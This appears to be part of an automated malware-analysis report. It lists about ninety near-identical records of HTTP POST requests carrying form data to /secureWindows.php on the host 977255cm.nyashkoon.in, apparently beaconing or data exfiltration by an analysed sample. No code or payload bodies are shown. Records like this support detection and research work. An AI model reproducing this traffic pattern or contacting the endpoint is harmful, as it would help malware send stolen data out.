                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1312Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
